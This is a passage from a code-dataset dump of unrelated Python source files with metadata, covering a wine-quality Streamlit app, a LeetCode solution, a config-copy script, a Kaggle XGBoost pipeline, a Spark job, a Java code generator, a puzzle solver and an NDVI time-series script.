dioxide\",11))\r\ntotal_sulphur_dioxide = np.float(col1.text_input(\"Total Sulphur dioxide\",34))\r\ndensity = np.float(col2.text_input(\"Density\",0.9978))\r\nph = np.float(col3.text_input(\"PH\",3.51))\r\nsulphates = np.float(col1.text_input(\"Sulphate\",0.56))\r\nalcohol = np.float(col2.text_input(\"Alcohol\",0.7))\r\n\r\nfeatures_num = ['fixed acidity','volatile acidity','citric acid',\r\n 'residual sugar','chlorides','free sulfur dioxide',\r\n 'total sulfur dioxide','density','pH','sulphate','alcohol']\r\n\r\n\r\n\r\nsample = [fixed_acidity,\r\n volatile_acidity,\r\n citric_acidity,\r\n residual_sugar,\r\n chlorides,\r\n free_sulphur_dioxide,\r\n total_sulphur_dioxide,\r\n density,\r\n ph,\r\n sulphates,\r\n alcohol\r\n ]\r\n\r\nsample_df = pd.DataFrame([sample],columns = features_num)\r\nmodel = pickle.load(open('model.pkl',\"rb\"))\r\n\r\n\r\nif st.button('Predict'):\r\n result = model.predict(sample_df)\r\n if result == 3:\r\n st.header(\"Lowest Quality\")\r\n elif result == 4:\r\n st.header(\"Low Quality\")\r\n elif result == 5:\r\n st.header(\"Medium Quality\")\r\n elif result == 6:\r\n st.header(\"Average Quality\")\r\n elif result == 7:\r\n st.header(\"Good Quality\")\r\n else:\r\n st.header(\"Best Quality\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534151549","text":"from typing import List\n\n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n m = len(board); n = len(board[0])\n \n def helper(row, col, idx, path):\n if row < 0 or m <= row:\n return False\n elif col < 0 or n <= col:\n return False\n \n if board[row][col] != word[idx]:\n return False\n \n if idx == len(word) - 1:\n return True\n \n for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n if not (0 <= row + dr < m and 0 <= col + dc < n):\n continue\n elif (row + dr, col + dc) in path:\n continue\n \n if helper(row + dr, col + dc, idx + 1, path + [(row, col)]):\n return True\n \n return False\n \n for i in range(m):\n for j in range(n):\n if helper(i, j, 0, []):\n return True\n \n return False\n\n def exist2(self, board: List[List[str]], word: str) -> bool:\n def helper(i, j, word):\n if len(word) == 0:\n return True\n elif i < 0 or len(board) <= i or j < 0 or len(board[0]) <= j:\n return False\n elif word[0] != board[i][j]:\n return False\n\n tmp = board[i][j]\n board[i][j] = '#'\n res = helper(i + 1, j, word[1:]) or helper(i - 1, j, word[1:]) \\\n or helper(i, j + 1, word[1:]) or helper(i, j - 1, word[1:])\n board[i][j] = tmp\n return res\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if helper(i, j, word):\n return True\n\n return False\n \n\nif __name__ == '__main__':\n s = Solution()\n board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\n word = \"ABCCED\"\n print(s.exist(board, word))\n print(s.exist2(board, word))\n","sub_path":"leetcode/medium/word-search.py","file_name":"word-search.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12585139","text":"import typing\nimport os\nimport sys\nimport argparse\nimport util\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=f\"copies all files to the system according to {util.LOCATIONS_PATH}\",\n epilog=f'''\nexamples:\n{sys.argv[0]} --only vimrc plugin.conf\n{sys.argv[0]} --all\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n util.argparse_add_process_all_or_only_options(parser)\n args = parser.parse_args()\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n filtered = None\n if args.all:\n filtered = []\n if not args.all and args.only:\n filtered = args.only\n\n to_path = util.get_locations_dictionary(util.LOCATIONS_PATH)\n for conf in to_path.keys():\n if filtered and conf not in filtered: continue\n os.system(f'cp -v {conf} {to_path[conf]}')\n\n","sub_path":"push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434384789","text":"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport xgboost as xgb\nimport csv\n\n\n#class for final pipeline\nclass Pipeline:\n \n def __init__(self, dataset, preprocessor, model):\n \n self.dataset = dataset \n self.preprocessor = preprocessor\n self.model = model\n \n #calls the preprocessor function on the dataset\n #outputs explained:\n #X: training features\n #y: ground truth\n #X_test: test features\n #test_id: the ids corresponding to X_test. Needed for creating final csv files\n #test_id_ndf: the ids for ndf found using date_first_booking = NULL\n def process(self):\n \n self.X , self.y, self.X_test, self.test_id, self.test_id_ndf = preprocessor(self.dataset)\n \n #train the model on processed data \n def train(self):\n \n self.model.fit(self.X, self.y)\n \n #create the predictions on the test data \n def predict(self):\n \n targets = ['AU', 'CA', 'DE', 'ES', 'FR', 'GB', 'IT', 'NL', 'PT', 'US','other']\n\n y_probs = self.model.predict_proba(self.X_test)\n y_pred = []\n for i in y_probs:\n max = [0,0,0]\n\n for j in range(len(i)):\n if(i[j] > i[max[0]]):\n max[2] = max[1]\n max[1] = max[0]\n max[0] = j\n elif(i[j] > i[max[1]]):\n max[2] = max[1]\n max[1] = j\n elif(i[j] > i[max[2]]):\n max[2] = j\n\n y_pred.append([targets[max[0]], targets[max[1]], targets[max[2]] ])\n \n self.predictions = y_pred\n \n #create the final csv for submission \n def create_csv(self, filename):\n \n fields = ['id','country_destination']\n final = []\n final.append(fields)\n for i in range(len(self.test_id)):\n for j in range(3):\n final.append([self.test_id[i],self.predictions[i][j]])\n\n for i in self.test_id_ndf:\n final.append([i,\"NDF\"])\n\n with open(filename + \".csv\", 'w') as f:\n w = csv.writer(f)\n w.writerows(final)\n\n#class for dataset \nclass Dataset:\n\n def __init__(self, datadir):\n # datadir = \"/kaggle/input/airbnb-new-user/\"\n self.train = pd.read_csv(datadir + \"train.csv\")\n self.test = pd.read_csv(datadir + \"test.csv\")\n self.session = pd.read_csv(datadir + \"sessions.csv\")\n\n\n#helper function for pre processing.\ndef process_field(x,field_list):\n if x in field_list:\n return x\n return -1\n\n#helper function for pre processing\ndef create_rename_dict(x, field_name):\n \n rename_dict = {}\n for i in x:\n string = str(i)\n string = field_name + \"_\" + string \n rename_dict[i] = string\n rename_dict[-1] = field_name + \"_misc\" \n return rename_dict\n\n\n#function to undertake all preprocessing required\ndef preprocessor(dataset):\n\n train = dataset.train\n test = dataset.test\n \n #seperate ndf from remaining\n test_id_ndf = test[test['date_first_booking'].isnull()].id.to_list()\n\n train = train[train['date_first_booking'].notnull()]\n test = test[test['date_first_booking'].notnull()] \n \n \n #list to specify which features to train on. We can add and remove based on what we want\n features = [ 'language', \"signup_flow\", \"affiliate_provider\"]\n\n #some binning to reduce unecessary unique values\n train.loc[train.gender == \"-unknown-\", 'gender'] = \"unknown\"\n test.loc[test.gender == \"-unknown-\", 'gender'] = \"unknown\"\n train.loc[train.first_device_type == \"Android Tablet\", \"first_device_type\"] = \"Android Phone\"\n test.loc[test.first_device_type == \"Android Tablet\", \"first_device_type\"] = \"Android Phone\"\n train.loc[train.first_device_type == \"iPad\", \"first_device_type\"] = \"iPhone\"\n test.loc[test.first_device_type == \"iPad\", \"first_device_type\"] = \"iPhone\"\n train.loc[train.first_browser == \"Chrome Mobile\", \"first_browser\"] = \"Chrome\"\n test.loc[test.first_browser == \"Chrome Mobile\", \"first_browser\"] = \"Chrome\"\n\n #specify which unique values get their own one hot encoding. Values not in the list will all be binned into misclaneous\n field_dict = {}\n field_dict[\"gender\"] = [ \"MALE\", \"FEMALE\"]\n field_dict[\"signup_method\"] = [\"basic\", 'facebook']\n field_dict[\"signup_flow\"] = [0, 25, 24, 23, 12, 8]\n field_dict[\"language\"] = ['en', 'fr', 'it' ]\n field_dict[\"affiliate_channel\"] = list(train[\"affiliate_channel\"].unique())\n field_dict[\"affiliate_provider\"] = ['direct', 'google', 'facebook', 'other', 'padmapper']\n field_dict[\"first_affiliate_tracked\"] = ['untracked', 'omg', 'linked', 'tracked-other', 'product']\n field_dict[\"signup_app\"] = ['Web', \"iOS\", 'Android', \"Moweb\"]\n field_dict[\"first_device_type\"] = [\"Mac Desktop\", \"Windows Desktop\", \"iPhone\", \"Android Phone\" ]\n field_dict[\"first_browser\"] = [\"Chrome\", \"Safari\", \"Firefox\", \"Mobile Safari\", \"IE\"] \n \n #Processes each field according to the field dicts specified above. Here the misclaneous values are binned\n for i in features:\n train.loc[:,i] = train[i].apply(lambda x: process_field(x, field_dict[i]))\n test.loc[:,i] = test[i].apply(lambda x: process_field(x, field_dict[i]))\n \n #create new dataframe for final processed features\n X = pd.DataFrame()\n X_test = pd.DataFrame()\n test_id = test['id'].to_list()\n \n \n #perform one hot encoding\n for i in features:\n onehot = pd.get_dummies(train[i])\n onehot = onehot.rename(columns = create_rename_dict(field_dict[i], i))\n X = pd.concat([X, onehot], axis=1, sort=False)\n \n onehot = pd.get_dummies(test[i])\n onehot = onehot.rename(columns = create_rename_dict(field_dict[i], i))\n X_test = pd.concat([X_test, onehot], axis=1, sort=False) \n \n #ground truth\n y = pd.DataFrame()\n y[\"country_destination\"] = train[\"country_destination\"]\n \n return X , y, X_test, test_id, test_id_ndf \n\nmodel = xgb.XGBClassifier( n_estimators = 800, eta = 0.001, reg_lambda = 800, tree_method = \"gpu_hist\")\n\ndataset = Dataset(\"/kaggle/input/airbnb-new-user/\")\n\npipeline = Pipeline(dataset, preprocessor, model)\n\npipeline.process()\npipeline.train()\npipeline.predict()\npipeline.create_csv(\"final_submission\")\n","sub_path":"Final Code/pipeline-best-private-leaderboard.py","file_name":"pipeline-best-private-leaderboard.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600751729","text":"import sys\nfrom csv import reader\nfrom pyspark import SparkContext\n\nif __name__ == \"__main__\":\n sc = SparkContext()\n lines = sc.textFile(sys.argv[1], 1)\n lines = lines.mapPartitions(lambda x: reader(x))\n lines = lines.map(lambda x: ((x[14], x[16]), -1)).reduceByKey(lambda x, y: x+y)\n line = lines.sortBy(lambda x: (x[1],x[0])).take(20)\n res = sc.parallelize(line).map(lambda x: (x[0][0], x[0][1], -x[1]))\n res.map(lambda x: \"{0}, {1}\\t{2}\".format(x[0], x[1], x[2])).saveAsTextFile(\"task6.out\")\n sc.stop()\n\n","sub_path":"Spark/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524576199","text":"from app.logic.AuditLog import AuditLog\nfrom app.logic.Dice import Dice\nfrom app.logic.Player import Player\nfrom app.logic.Store import Store\nfrom app.logic.StoreManager import StoreManager\n\n\nclass Game:\n def __init__(self):\n self.store = Store()\n self.players = {}\n self.audit_log = AuditLog()\n self.store_manager = StoreManager(self.store)\n self.dice = Dice(self.audit_log, self.store_manager)\n\n def reset_game(self):\n self.store = Store()\n self.players = {}\n self.audit_log = AuditLog()\n self.store_manager = StoreManager(self.store)\n self.dice = Dice(self.audit_log, self.store_manager)\n\n def add_player(self, player_name):\n if player_name.lower() not in self.players:\n self.players[player_name.lower()] = Player(player_name, self.audit_log)\n\n def get_player(self, player_name):\n return self.players[player_name.lower()]\n","sub_path":"app/logic/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206016046","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2019, Minor Gordon\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND\n# CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\n# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\n# OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\nfrom thryft.generator.function import Function\nfrom thryft.generators.java._java_named_construct import _JavaNamedConstruct\nfrom thryft.generators.java.java_struct_type import JavaStructType\nfrom thryft.util import lower_camelize, lpad, indent, upper_camelize\n\n\nclass JavaFunction(Function, _JavaNamedConstruct):\n class _JavaMessageType(JavaStructType):\n pass\n\n class _JavaRequestType(_JavaMessageType, Function._RequestType):\n def __init__(self, parent_function, parameters=None, **kwds):\n JavaFunction._JavaMessageType.__init__(\n self,\n java_class_modifiers='public final static',\n name=upper_camelize(parent_function.name) + 'Request',\n parent=parent_function.parent,\n **kwds\n )\n Function._RequestType.__init__(self, parent_function=parent_function, parameters=parameters)\n\n class _JavaResponseType(_JavaMessageType, Function._ResponseType):\n def __init__(self, parent_function, **kwds):\n JavaFunction._JavaMessageType.__init__(\n self,\n java_class_modifiers='public final static',\n name=upper_camelize(parent_function.name) + 'Response',\n parent=parent_function.parent,\n **kwds\n )\n Function._ResponseType.__init__(self, parent_function=parent_function)\n\n def java_annotations(self):\n annotations = []\n for requires_x in ('authentication', 'guest', 'user'):\n for annotation in self.annotations:\n if annotation.name == 'requires_' + requires_x:\n annotations.append('@org.apache.shiro.authz.annotation.Requires' + requires_x.capitalize())\n break\n for requires_x in ('permissions', 'roles'):\n for annotation in self.annotations:\n if annotation.name == 'requires_' + requires_x:\n annotations.append(\"@org.apache.shiro.authz.annotation.Requires%s({ %s })\" % (\n requires_x.capitalize(),\n ', '.join('\"%s\"' % x for x in annotation.value)\n ))\n break\n return annotations\n\n def java_declarations(self):\n javadoc = self.java_doc()\n name = self.java_name()\n if self.return_field is not None:\n return_type_name = self.return_field.type.java_qname()\n else:\n return_type_name = 'void'\n throws = \\\n lpad(\n ' throws ',\n ', '.join(field.type.java_qname()\n for field in self.throws)\n )\n\n declarations = []\n for parameters in self._java_overload_parameter_lists():\n if len(parameters) < len(self.parameters) and self._parent_generator().default_methods:\n declarations.append(self.__java_delegation_definition(parameters, default=True))\n else:\n parameters = \\\n ', '.join(parameter.java_parameter(final=True) for parameter in parameters)\n declarations.append(\"\"\"\\\n%(javadoc)spublic %(return_type_name)s %(name)s(%(parameters)s)%(throws)s;\"\"\" % locals())\n return declarations\n\n def __java_delegation_definition(self, parameters, default=False):\n if default:\n default = 'default '\n name = self.java_name()\n if self.return_field is not None:\n return_prefix = 'return '\n return_type_name = self.return_field.type.java_qname()\n else:\n return_prefix = ''\n return_type_name = 'void'\n throws = \\\n lpad(\n ' throws ',\n ', '.join(field.type.java_qname()\n for field in self.throws)\n )\n\n parameters = [parameter.java_parameter(final=True) for parameter in parameters]\n delegate_values = []\n for parameter_i, parameter in enumerate(self.parameters):\n if parameter.required:\n delegate_values.append(parameter.java_name())\n elif parameter_i < len(parameters):\n delegate_values.append(parameter.java_name())\n else:\n delegate_values.append(parameter.java_absent_value())\n delegate_values = ', '.join(delegate_values)\n parameters = ', '.join(parameters)\n return \"\"\"\\\npublic %(default)s%(return_type_name)s %(name)s(%(parameters)s)%(throws)s {\n %(return_prefix)s%(name)s(%(delegate_values)s);\n}\"\"\" % locals()\n\n def _java_delegating_definitions(self):\n definitions = []\n for parameters in self._java_overload_parameter_lists():\n if len(parameters) == len(self.parameters):\n continue\n definitions.append(self.__java_delegation_definition(parameters, default=False))\n return definitions\n\n def java_doc(self):\n javadoc_lines = []\n if self.doc is not None:\n javadoc_lines.extend(line.strip() for line in self.doc.splitlines())\n javadoc_lines.append('')\n\n name = self.java_name()\n\n for parameter in self.parameters:\n if parameter.doc is not None:\n javadoc_lines.append(\"@param %s %s\" % (parameter.java_name(), parameter.doc))\n\n if self.return_field is not None and self.return_field.doc is not None:\n javadoc_lines.append('@return ' + self.return_field.doc)\n\n for field in self.throws:\n if field.doc is not None:\n javadoc_lines.append(\"@throws %s %s\" % (field.type.java_qname(), field.doc))\n\n if len(javadoc_lines) > 0:\n javadoc_lines = \"\\n\".join(' * ' + javadoc_line for javadoc_line in javadoc_lines)\n return \"\"\"\\\n/**\n%(javadoc_lines)s\n */\n\"\"\" % locals()\n else:\n return ''\n\n def java_message_types(self, **kwds):\n message_types = [self.java_request_type(**kwds)]\n if not self.oneway:\n message_types.append(self.java_response_type(**kwds))\n return message_types\n\n def java_name(self):\n return lower_camelize(self.name)\n\n def _java_overload_parameter_lists(self):\n if not self._parent_generator().function_overloads:\n return (self.parameters,)\n\n first_optional_parameter_i = -1\n for parameter_i, parameter in enumerate(self.parameters):\n if not parameter.required:\n first_optional_parameter_i = parameter_i\n break\n if first_optional_parameter_i == -1:\n return (self.parameters,)\n\n overload_parameter_lists = []\n for optional_parameter_i in range(first_optional_parameter_i, len(self.parameters)+1):\n overload_parameter_lists.append(tuple(self.parameters[:optional_parameter_i]))\n return overload_parameter_lists\n\n def java_qname(self, **_kwds):\n return self.parent.java_qname() + '.' + self.java_name()\n\n def java_request_type(self, **kwds):\n return self._JavaRequestType(parent_function=self, **kwds)\n\n def java_response_type(self, **kwds):\n return self._JavaResponseType(parent_function=self, **kwds)\n","sub_path":"compiler/src/thryft/generators/java/java_function.py","file_name":"java_function.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266884534","text":"from frozendict import frozendict\n\n# Puzzle Input ----------\nwith open('Day23-Input.txt') as file:\n puzzle = file.read().split('\\n')\n\nwith open('Day23-Test01.txt') as file:\n test01 = file.read().split('\\n')\n\n\n# Main Code ----------\n\n# See what amphipods are in each room\ndef process_burrow(burrow: list):\n rooms = [[] for _ in range(4)]\n for room_num, room_pos in enumerate(range(3, 10, 2)):\n for amphipod in range(2):\n rooms[room_num] += [burrow[amphipod + 2][room_pos]]\n\n # Coordinate system for the burrow\n coords = {f'H{str(hex(x))[-1]}': '.' for x in range(11)}\n hallway_coords = list(coords.keys())\n room_coords = []\n for room_letter, room in [('A', rooms[0]), ('B', rooms[1]), ('C', rooms[2]), ('D', rooms[3])]:\n for room_space, amphipod in enumerate(room):\n coords[f'{room_letter}{room_space}'] = amphipod\n room_coords += [f'{room_letter}{room_space}']\n return coords, hallway_coords, room_coords\n\n\n# Get the energy per step associated with each amphipod\ndef energy_per_step(amphipod: str):\n energy_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n return energy_dict[amphipod]\n\n\n# See if the amphipod can and should leave the room\ndef can_leave_room(coords, start):\n # Ignore empty spaces\n if coords[start] == '.':\n return False\n\n room, y = start\n amphipod = coords[start]\n\n max_y = 1\n y = int(y)\n if amphipod != room:\n # It's on the room piece connecting to the hallway\n if y == 0:\n return True\n\n # See if the other room slots are blocked\n for room_y in range(y - 1, -1, -1):\n if coords[f'{room}{room_y}'] != '.':\n return False\n return True\n\n # If the amphipod is in the right room, see if there are only other amphipods of the same type in there\n else:\n for room_y in range(y, max_y + 1):\n if coords[f'{room}{room_y}'] != amphipod:\n return True\n return False\n\n\n# See if a room only has the right type of amphipods\ndef room_right_amphipods(coords, amphipod):\n max_y = 1\n\n for room_y in range(max_y + 1):\n if not coords[amphipod + str(room_y)] in [amphipod, '.']:\n return False\n return True\n\n\n# Get the possible moves the amphipods can make\ndef possible_moves(coords, hallway_coords: list, room_coords: list):\n moves = []\n\n # Coordinates of the rooms\n room_by_amphipod = {\n 'A': 2,\n 'B': 4,\n 'C': 6,\n 'D': 8\n }\n\n for start in room_coords:\n if not can_leave_room(coords, start):\n continue\n\n amphipod = coords[start]\n\n # Check if the amphipod can go from one room to the right room\n if room_right_amphipods(coords, amphipod):\n\n # Check the hallway path to there is clear\n start_hall = room_by_amphipod[start[0]]\n end_hall = room_by_amphipod[amphipod]\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall + 1, end_hall)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall + 1, start_hall)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n end = amphipod + '1' if coords[amphipod + '1'] == '.' else amphipod + '0'\n steps = int(start[1]) + 1 + abs(start_hall - end_hall) + int(end[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n\n for end in hallway_coords:\n if coords[end] != '.':\n continue\n\n # Check the hallway path there is clear\n start_hall = room_by_amphipod[start[0]]\n end_hall = int(end[1], 16)\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall, end_hall + 1)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall, start_hall + 1)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n steps = abs(start_hall - end_hall) + int(start[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n\n # The amphipod starts in an hallway\n for start in hallway_coords:\n\n # Ignore empty spaces\n if coords[start] == '.':\n continue\n\n amphipod = coords[start]\n\n # Check if the room only has amphipods of the right type\n if room_right_amphipods(coords, amphipod):\n\n # Check that the hallway path to there is clear\n start_hall = int(start[1], 16)\n end_hall = room_by_amphipod[amphipod]\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall + 1, end_hall)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall + 1, start_hall)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n end = amphipod + '1' if coords[amphipod + '1'] == '.' else amphipod + '0'\n steps = abs(start_hall - end_hall) + int(end[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n return moves\n\n\n# See the theoretical minimum or maximum energy to get from the current state to the solution state\nlimit_energy_memory = dict()\n\n\ndef limit_energy(coords, minimum=True):\n if coords in limit_energy_memory:\n return limit_energy_memory[coords]\n max_y = 1\n\n # Coordinates of the rooms\n room_by_amphipod = {\n 'A': 2,\n 'B': 4,\n 'C': 6,\n 'D': 8\n }\n\n energy = 0\n for room in ['A', 'B', 'C', 'D']:\n for room_y in range(0, max_y + 1):\n amphipod = coords[room + str(room_y)]\n if amphipod == '.':\n continue\n\n start_hall = room_by_amphipod[room]\n end_hall = room_by_amphipod[amphipod]\n\n if minimum:\n steps = abs(end_hall - start_hall) + int(room_y) * 2 + 2\n else:\n steps = end_hall + start_hall + int(room_y) * 2 + 2\n energy += steps * energy_per_step(amphipod)\n\n for hallway_num in range(0, 11):\n hallway_str = str(hex(hallway_num))[-1]\n amphipod = coords['H' + hallway_str]\n if amphipod == '.':\n continue\n\n start_hall = hallway_num\n end_hall = room_by_amphipod[amphipod]\n\n if minimum:\n steps = abs(end_hall - start_hall) + 1\n else:\n steps = end_hall + start_hall + max_y + 1\n energy += steps * energy_per_step(amphipod)\n\n limit_energy_memory[coords] = energy\n return energy\n\n\n# Do a move\ndef move_amphipod(coords, move: tuple):\n coords = dict(coords).copy()\n start, end, energy = move\n coords[start], coords[end] = '.', coords[start]\n return frozendict(coords)\n\n\ndef mini_energy_sort(burrow: list):\n coords, hallway_coords, room_coords = process_burrow(burrow)\n hallway_coords.remove('H2')\n hallway_coords.remove('H4')\n hallway_coords.remove('H6')\n hallway_coords.remove('H8')\n\n solution = {'H0': '.', 'H1': '.', 'H2': '.', 'H3': '.', 'H4': '.', 'H5': '.', 'H6': '.', 'H7': '.', 'H8': '.',\n 'H9': '.', 'Ha': '.', 'A0': 'A', 'A1': 'A', 'B0': 'B', 'B1': 'B', 'C0': 'C', 'C1': 'C', 'D0': 'D',\n 'D1': 'D'}\n\n coords = frozendict(coords)\n solution = frozendict(solution)\n\n connections = dict()\n connections[coords] = [0, None]\n\n mini_energy = limit_energy(coords, False)\n\n # Search all possible states\n while True:\n differences = False\n for start_coords in connections.copy():\n start_energy, end = connections[start_coords]\n\n # See if this node is the solution\n if start_coords == solution:\n mini_energy = min(mini_energy, start_energy)\n continue\n\n # See if this node has been searched\n if end:\n continue\n\n # See if this node is already above the solution energy\n if start_energy + limit_energy(start_coords) > mini_energy:\n continue\n\n end = list()\n\n # See every possible move we can make from here\n moves = possible_moves(start_coords, hallway_coords, room_coords)\n for m in moves:\n # Move consequences\n new_coords = move_amphipod(start_coords, m)\n new_energy = start_energy + m[2]\n\n # If we have seen this end state...\n if new_coords in connections:\n seen_energy, seen_children = connections[new_coords]\n delta_energy = new_energy - seen_energy\n\n # ...and the new energy is lower than the one we had found, then recursively lower the energy of all children states\n if delta_energy < 0:\n differences = True\n to_check = [(new_coords, delta_energy)]\n\n while len(to_check) > 0:\n parent_coords, delta_energy = to_check.pop()\n parent_energy, children = connections[parent_coords]\n\n connections[parent_coords] = [parent_energy + delta_energy, children]\n if not children:\n continue\n for child in children:\n child_coords, child_energy = child\n child_energy += delta_energy\n\n child_mini_energy, child_children = connections[child_coords]\n child_delta_energy = child_energy - child_mini_energy\n if child_delta_energy < 0:\n to_check += [(child_coords, child_delta_energy)]\n\n else:\n differences = True\n end += [(new_coords, new_energy)]\n connections[new_coords] = [new_energy, None]\n connections[start_coords] = [start_energy, end]\n\n if not differences:\n break\n print(f'\\nCurrent minimum energy: {mini_energy}')\n print(f'Current connections: {len(connections)}')\n\n return mini_energy\n\n\n# Tests and Solution ----------\nprint(mini_energy_sort(test01))\nprint(mini_energy_sort(puzzle))\n\n","sub_path":"2021/Day23/Day23-Prob1-Minimum-Energy-Sort.py","file_name":"Day23-Prob1-Minimum-Energy-Sort.py","file_ext":"py","file_size_in_byte":11023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578413298","text":"#!/usr/bin/python3\n\n\"\"\"\n目标:提取时序NDVI数据\n\n输入:中国和美国国境内任意点的信息,包括以下两种形式:\n\t1. 经纬度描述的坐标点,以.json的文件形式输入,符合geojson的标准定义\n\t2. geojson描述的多边形,以.json的文件形式输入,符合geojson的标准定义\n\n输出:根据输入不同,给出不同的输出结果\n\t1. 由经纬度输入的,输出时序NDVI值,输出结果为以下格式:\n\t\t[(timestamp, value)]\n\t2. 由多边形输入的,输出JPEG或PNG格式的NDVI图片,图片不用返回,只返回图片的文件路径即可,为以下格式\n\t\t[(timestamp, file_path)]\n\"\"\"\n\nfrom os.path import join\nimport time\nimport json\nimport os\n\nfrom RawDataIndex import RawDataIndex\nfrom ndvi_result_show import point_show\nfrom timingNDVI import timingNDVI\n\n\ndef point_process_timing(data_index): # 处理时序NDVI\n \"\"\"\n data_index:提出数据,保存位置的类\n \"\"\"\n lat = data_index.lat[0]\n lon = data_index.lon[0]\n sentinel_data = data_index.sentinel_data\n landsat_data = data_index.landsat_data\n data_index = None\n\n # 实例化timingDNVI类\n time_ndvi = timingNDVI()\n time_ndvi_result = []\n\n # 循环计算同一个点的sentinel NDVI\n for s in sentinel_data:\n calcu_data = time_ndvi._read_data(lat, lon, s) # 读数据\n if calcu_data is None:\n continue\n else:\n ndvi_result = time_ndvi.NDVI_generator(calcu_data) # 计算DNVI\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result) # 更新数据\n\n print(\"\\n Satellite Shoot time ndvi\\n\")\n print(\n \" %s %s \"\n % (\n time.strftime(\n \"%Y-%m-%dT%H:%M:%S\", time.localtime(time_ndvi.timestamp)\n ),\n time_ndvi.ndvi,\n )\n )\n\n time_ndvi_result = list(set(time_ndvi_result)) # 去除数据重复的影响\n time_ndvi_result.sort() # 数据按照时间排序\n\n sentinel_num = len(sentinel_data)\n sentinel_invaild_num = sentinel_num - len(time_ndvi_result) + 1\n print(\n \"Total find %s sentinel data and %s invaild.\"\n % (sentinel_num, sentinel_invaild_num)\n )\n\n # 循环计算landsat数据\n for l in landsat_data:\n calcu_data = time_ndvi._read_data(lat, lon, l) # 读数据\n if calcu_data is None:\n continue\n else:\n ndvi_result = time_ndvi.NDVI_generator(calcu_data) # 计算DNVI\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result) # 更新数据\n\n print(\"\\n Satellite Shoot time ndvi\\n\")\n print(\n \" %s %s \"\n % (\n time.strftime(\n \"%Y-%m-%dT%H:%M:%S\", time.localtime(time_ndvi.timestamp)\n ),\n time_ndvi.ndvi,\n )\n )\n\n time_ndvi = None\n\n time_ndvi_result = list(set(time_ndvi_result)) # 去除数据重复的影响\n time_ndvi_result.sort() # 数据按照时间排序\n\n landsat_num = len(landsat_data)\n landsat_invaild_num = 